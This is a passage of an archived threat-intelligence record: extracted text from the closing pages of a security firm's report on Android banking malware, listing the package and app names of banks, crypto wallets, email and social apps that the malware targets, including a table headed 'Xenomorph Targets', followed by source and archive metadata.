\r\ncom.infonow.bofa Bank of America Mobile Banking  \r\ncom.clairmail.fth Fifth Third Mobile Banking  \r\nca.tangerine.clients.banking.app Tangerine Mobile Banking  \r\nposteitaliane.posteapp.appbpol BancoPosta  \r\nca.pcfinancial.bank PC Financial Mobile  \r\nmx.bancosantander.supermovil Santander móvil  \r\ncom.htsu.hsbcpersonalbanking HSBC Mobile Banking  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 20 of 29\n\nPackage name App name  \r\ncom.amazon.mShop.android.shopping\r\nAmazon Shopping - Search, Find, Ship,\r\nand Save\r\n \r\norg.toshi\r\nCoinbase Wallet — Crypto Wallet \u0026\r\nDApp Browser\r\n \r\ncom.cbq.CBMobile CBQ Mobile  \r\ncom.samourai.wallet Samourai Wallet  \r\npt.cgd.caixadirectaempresas Caixadirecta Empresas  \r\ncom.squareup.cash Cash App  \r\ncom.empik.empikapp Empik  \r\neu.eleader.mobilebanking.pekao.firm PekaoBiznes24  \r\nau.com.rams.RAMS myRAMS  \r\ncom.finanteq.finance.ca CA24 Mobile  \r\npl.pkobp.iko IKO  \r\nuk.co.mbna.cardservices.android MBNA - Card Services App  \r\nit.popso.SCRIGNOapp SCRIGNOapp  \r\ncom.comarch.mobile.banking.bgzbnpparibas.biznes Mobile BiznesPl@net  \r\nuk.co.tescomobile.android Tesco Mobile  \r\npl.mbank mBank PL  \r\nes.cecabank.ealia2103appstore UniPay Unicaja  \r\nes.santander.money Santander Money Plan  \r\ncom.kubi.kucoin\r\nKuCoin: Bitcoin Exchange \u0026 Crypto\r\nWallet\r\n \r\ncom.bancocajasocial.geolocation Banco Caja Social Móvil  \r\ncom.konylabs.capitalone Capital One® Mobile  \r\nnet.garagecoders.e_llavescotiainfo ScotiaMóvil  \r\njp.co.netbk 住信SBIネット銀行  \r\nau.com.cua.mb CUA Mobile Banking  \r\ncom.americanexpress.android.acctsvcs.us Amex  \r\nfr.bred.fr BRED  \r\ncom.grupocajamar.wefferent Grupo Cajamar  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 21 of 29\n\nPackage name App name  \r\ncom.citibanamex.banamexmobile Citibanamex Móvil  \r\ncom.mcom.firstcitizens First Citizens Mobile Banking  \r\ncom.bancsabadell.wallet Sabadell Wallet  \r\ncom.whatsapp.w4b WhatsApp Business  \r\ncom.citizensbank.androidapp Citizens Bank Mobile Banking  \r\ncom.usbank.mobilebanking U.S. Bank - Inspired by customers  \r\norg.stgeorge.bank St.George Mobile Banking  \r\nfr.banquepopulaire.cyberplus Banque Populaire  \r\ncom.rsi ruralvía  \r\ncom.tmobtech.halkbank Halkbank Mobil  \r\nes.bancosantander.empresas Santander Empresas  \r\npt.bancobpi.mobile.fiabilizacao BPI APP  \r\ncom.bittrex.trade Bittrex Global  \r\ncom.twitter.android Twitter  \r\nau.com.bankwest.mobile Bankwest  \r\nde.traktorpool tractorpool  \r\nes.ceca.cajalnet Cajalnet  \r\norg.banking.stg.businessconnect St.George Business App  \r\norg.bom.bank Bank of Melbourne Mobile Banking  \r\nwit.android.bcpBankingApp.millenniumPL Bank Millennium  \r\neu.atlantico.bancoatlanticoapp MY ATLANTICO  \r\nnet.bnpparibas.mescomptes Mes Comptes BNP Paribas  \r\npt.bancobest.android.mobilebanking Best Bank  \r\ncom.ambank.ambankonline AmOnline  \r\ncom.bankinter.portugal.bmb Bankinter Portugal  \r\ncom.ziraat.ziraatmobil Ziraat Mobile  \r\ncom.scotiabank.banking Scotiabank Mobile Banking  \r\ncom.boursorama.android.clients Boursorama Banque  \r\ncom.akbank.android.apps.akbank_direkt Akbank  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 22 of 29\n\nPackage name App name  \r\nus.zoom.videomeetings ZOOM Cloud Meetings  \r\npl.ceneo Ceneo - zakupy i promocje  \r\ncom.ykb.android Yapı Kredi Mobile  \r\nau.com.commbank.commbiz.prod CommBiz  \r\nau.com.suncorp.SuncorpBank Suncorp Bank  \r\ncom.quoine.quoinex.light\r\nLiquid by Quoineライト版（リキッド\r\nバイコイン） -ビットコインなどの\r\n仮想通貨取引所\r\n \r\nhu.bb.mobilapp Budapest Bank Mobil App  \r\ncom.citibank.CitibankMY Citibank MY  \r\ncom.rbc.mobile.android RBC Mobile  \r\ncom.bmo.mobile BMO Mobile Banking  \r\ncom.bankinter.empresas Bankinter Empresas  \r\ncom.cbk.mobilebanking CBK Mobile  \r\ncom.oxigen.oxigenwallet Bill Payment \u0026 Recharge,Wallet  \r\ncom.tdbank TD Bank (US)  \r\ncom.db.pwcc.dbmobile Deutsche Bank Mobile  \r\ncom.kuveytturk.mobil Kuveyt Türk  \r\ncom.mobillium.papara Papara  \r\ntsb.mobilebanking TSB Bank Mobile Banking  \r\nch.autoscout24.autoscout24\r\nAutoScout24 Switzerland – Find your\r\nnew car\r\n \r\ncom.wallet.crypto.trustapp Trust: Crypto \u0026 Bitcoin Wallet  \r\ncom.advantage.RaiffeisenBank Raiffeisen Smart Mobile  \r\njp.co.aeonbank.android.passbook\r\nイオン銀行通帳アプリ かんたんロ\r\nグイン＆残高・明細の確認  \r\ncom.konylabs.HongLeongConnect Hong Leong Connect Mobile Banking  \r\ncom.targo_prod.bad TARGOBANK Mobile Banking  \r\norg.microemu.android.model.common.VTUserApplicationLINKMB Link Celular  \r\ncom.fibabanka.Fibabanka.mobile Fibabanka Mobile  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 23 of 29\n\nPackage name App name  \r\ncom.payeer PAYEER  \r\npl.bph BusinessPro Lite  \r\nes.santander.Criptocalculadora Criptocalculadora  \r\npt.sibs.android.mbway MB WAY  \r\ncom.bbva.mobile.pt BBVA Portugal  \r\norg.westpac.bank Westpac Mobile Banking  \r\nca.mobile.explorer CA Mobile  \r\neu.eleader.mobilebanking.pekao Pekao24Makler  \r\ncom.CIMB.OctoPH CIMB Bank PH  \r\nes.bancosantander.wallet Santander Wallet  \r\ncom.bitpanda.bitpanda Bitpanda - Buy Bitcoin in minutes  \r\ncom.imo.android.imoimhd imo HD-Free Video Calls and Chats  \r\nde.comdirect.android comdirect mobile App  \r\ncom.finanteq.finance.bgz BNP Paribas GOMobile  \r\ncom.arkea.android.application.cmso2\r\nCMSO ma banque : solde, virement \u0026\r\népargne\r\n \r\njp.co.rakuten_bank.rakutenbank 楽天銀行 -個人のお客様向けアプリ  \r\ncom.csam.icici.bank.imobile iMobile by ICICI Bank  \r\nes.liberbank.cajasturapp Banca Digital Liberbank  \r\ncom.cajaingenieros.android.bancamovil Caja de Ingenieros Banca MÓVIL  \r\ncom.IngDirectAndroid ING France  \r\ncom.microsoft.office.outlook\r\nMicrosoft Outlook: Organize Your\r\nEmail \u0026 Calendar\r\n \r\npt.santandertotta.mobileempresas Santander Empresas  \r\nau.com.ubank.internetbanking UBank Mobile Banking  \r\npl.noblebank.mobile Noble Mobile  \r\ncom.bmoharris.digital BMO Digital Banking  \r\nde.commerzbanking.mobil\r\nCommerzbank Banking - The app at\r\nyour side\r\n \r\nhu.cardinal.erste.mobilapp Erste Business MobilBank  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 24 of 29\n\nPackage name App name  \r\ncom.greater.Greater Greater Bank  \r\ncom.db.pbc.miabanca La Mia Banca  \r\nau.com.mebank.banking ME Bank  \r\ncom.ubercab.eats Uber Eats: Food Delivery  \r\nposteitaliane.posteapp.apppostepay Postepay  \r\ncom.abnamro.nl.mobile.payments ABN AMRO Mobiel Bankieren  \r\ncom.arkea.android.application.cmb Crédit Mutuel de Bretagne  \r\nfr.creditagricole.androidapp Ma Banque  \r\nde.postbank.finanzassistent Postbank Finanzassistent  \r\nmbanking.NBG NBG Mobile Banking  \r\ncom.fusion.ATMLocator People’s Choice Credit Union  \r\nfr.oney.mobile.mescomptes Oney France  \r\nde.fiducia.smartphone.android.banking.vr VR Banking Classic  \r\nau.com.hsbc.hsbcaustralia HSBC Australia  \r\norg.telegram.messenger Telegram  \r\neu.eleader.mobilebanking.abk ABK Mobile Banking  \r\ncom.gmowallet.mobilewallet\r\nビットコイン・暗号資産（仮想通\r\n貨）ウォレットアプリ GMOコイン\r\n｜チャート・購入・レバレッジ取引\r\n \r\ncom.snapchat.android Snapchat  \r\ncom.mediolanum Banco Mediolanum España  \r\ncom.facebook.katana Facebook  \r\ncom.wrx.wazirx\r\nWazirX - Buy Sell Bitcoin \u0026 Other\r\nCryptocurrencies\r\n \r\npl.bps.bankowoscmobilna BPS Mobilnie  \r\ncom.viber.voip\r\nViber Messenger - Messages, Group\r\nChats \u0026 Calls\r\n \r\ncom.infrasofttech.MahaBank Maha Mobile  \r\npl.raiffeisen.nfc Mobilny Portfel  \r\norg.banking.bsa.businessconnect BankSA Business App  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 25 of 29\n\nPackage name App name  \r\npl.bzwbk.ibiznes24 iBiznes24 mobile  \r\ncom.discoverfinancial.mobile Discover Mobile  \r\npl.ifirma.ifirmafaktury IFIRMA - Darmowy Program do Faktur  \r\ncom.empik.empikfoto Empik Foto  \r\npl.envelobank.aplikacja Pocztowy  \r\ncom.fi7026.godough Commercial Bank Mobile Banking  \r\nuk.co.santander.santanderUK Santander Mobile Banking  \r\npiuk.blockchain.android\r\nBlockchain Wallet. Bitcoin, Bitcoin\r\nCash, Ethereum\r\n \r\nmobi.societegenerale.mobile.lappli L’Appli Société Générale  \r\npt.santandertotta.mobileparticulares Santander Particulares  \r\ncom.moneybookers.skrillpayments Skrill - Fast, secure online payments  \r\nfr.laposte.lapostemobile La Poste - Services Postaux  \r\ncom.mercadopago.wallet Mercado Pago  \r\ncom.usaa.mobile.android.usaa USAA Mobile  \r\nXenomorph Targets\r\nPackage name App name  \r\ncom.exictos.mbanka.bic Banco BIC, SA  \r\ncom.meridian.android Meridian Mobile Banking  \r\ncom.bbva.mobile.pt BBVA Portugal  \r\nnet.bitbay.bitcoin Bitcoin \u0026 Crypto Exchange - BitBay  \r\nca.mobile.explorer CA Mobile  \r\ncom.mail.mobile.android.mail mail.com mail  \r\ncom.bankinter.launcher Bankinter Móvil  \r\ncom.paypal.android.p2pmobile PayPal Mobile Cash: Send and Request Money Fast  \r\ncom.mediolanum Banco Mediolanum España  \r\npt.novobanco.nbapp NB smart app  \r\nca.hsbc.hsbccanada HSBC Canada  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 26 of 29\n\nPackage name App name  \r\ncom.transferwise.android TransferWise Money Transfer  \r\ncom.cajasur.android Cajasur  \r\nes.pibank.customers Pibank  \r\nwit.android.bcpBankingApp.millennium Millenniumbcp  \r\nca.motusbank.mapp motusbank mobile banking  \r\ncom.db.pbc.mibanco Mi Banco db  \r\nes.univia.unicajamovil UnicajaMovil  \r\nes.openbank.mobile Openbank – banca móvil  \r\ncom.pcfinancial.mobile Simplii Financial  \r\ncom.cibc.android.mobi CIBC Mobile Banking®  \r\ncom.bbva.netcash BBVA Net Cash ES \u0026 PT\r\nes.cecabank.ealia2091appstore ABANCA Pay - Paga y envía dinero con el móvil  \r\ncom.plunien.poloniex Poloniex Crypto Exchange  \r\ncom.rbc.mobile.android RBC Mobile  \r\ncom.squareup.cash Cash App  \r\ncom.indra.itecban.mobile.novobanco NBapp Spain  \r\ncom.rsi ruralvía  \r\nes.liberbank.cajasturapp Banca Digital Liberbank  \r\ncom.yahoo.mobile.client.android.mail Yahoo Mail – Organized Email  \r\ncom.desjardins.mobile Desjardins mobile services  \r\nes.evobanco.bancamovil EVO Banco móvil  \r\ncom.microsoft.office.outlook Microsoft Outlook: Organize Your Email \u0026 Calendar  \r\ncom.td TD Canada  \r\nca.affinitycu.mobile Affinity Mobile  \r\ncom.shaketh Shakepay: Buy Bitcoin Canada  \r\ncom.indra.itecban.triodosbank.mobile.banki -  \r\nes.cm.android Bankia  \r\ncom.binance.dev Binance - Buy \u0026 Sell Bitcoin Securely  \r\nes.ibercaja.ibercajaapp Ibercaja  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 27 of 29\n\nPackage name App name  \r\ncom.eqbank.eqbank EQ Bank Mobile Banking  \r\ncom.connectivityapps.hotmail Connect for Hotmail \u0026 Outlook: Mail and Calendar  \r\npt.bancobpi.mobile.fiabilizacao BPI APP  \r\ncgd.pt.caixadirectaparticulares Caixadirecta  \r\nca.bnc.android National Bank of Canada  \r\ncom.imaginbank.app imaginBank - Your mobile bank  \r\ncom.anabatic.canadia Canadia Mobile Banking  \r\nes.cecabank.ealia2103appstore UniPay Unicaja  \r\norg.electrum.electrum Electrum Bitcoin Wallet  \r\nes.caixagalicia.activamovil ABANCA- Banca Móvil  \r\nwww.ingdirect.nativeframe ING España. Banca Móvil  \r\ncom.coinbase.android Coinbase – Buy \u0026 Sell Bitcoin. Crypto Wallet  \r\ncom.bbva.bbvacontigo BBVA Spain  \r\napp.wizink.es WiZink, tu banco senZillo  \r\ncom.wavesplatform.wallet Waves.Exchange  \r\npiuk.blockchain.android Blockchain Wallet. Bitcoin, Bitcoin Cash, Ethereum  \r\ncom.scotiabank.banking Scotiabank Mobile Banking  \r\nnet.bitstamp.app Bitstamp – Buy \u0026 Sell Bitcoin at Crypto Exchange  \r\nes.caixaontinyent.caixaontinyentapp Caixa Ontinyent  \r\ncom.kraken.trade Pro: Advanced Bitcoin \u0026 Crypto Trading  \r\ncom.coastcapitalsavings.dcu Coast Capital Savings  \r\nes.bancosantander.apps Santander  \r\nca.servus.mbanking Servus Mobile Banking  \r\ncom.atb.ATBMobile ATB Personal - Mobile Banking  \r\ncom.targoes_prod.bad TARGOBANK - Banca a distancia  \r\nca.manulife.MobileGBRS Manulife Mobile  \r\ncom.grupocajamar.wefferent Grupo Cajamar  \r\ncom.tecnocom.cajalaboral Banca Móvil Laboral Kutxa  \r\nes.lacaixa.mobile.android.newwapicon CaixaBank  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 28 of 29\n\nPackage name App name  \r\ncom.google.android.gm Gmail  \r\ncom.abanca.bm.pt ABANCA - Portugal  \r\nca.tangerine.clients.banking.app Tangerine Mobile Banking  \r\ncom.bitfinex.mobileapp Bitfinex  \r\npt.sibs.android.mbway MB WAY  \r\nca.pcfinancial.bank PC Financial Mobile  \r\nSource: https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 29 of 29",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html"
	],
	"report_names": [
		"zombinder-ermac-and-desktop-stealers.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775791266,
	"ts_updated_at": 1775791339,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c1fb13307fd20c70ede43fdc67df93c6c5ba7adf.pdf",
		"text": "https://archive.orkl.eu/c1fb13307fd20c70ede43fdc67df93c6c5ba7adf.txt",
		"img": "https://archive.orkl.eu/c1fb13307fd20c70ede43fdc67df93c6c5ba7adf.jpg"
	}
}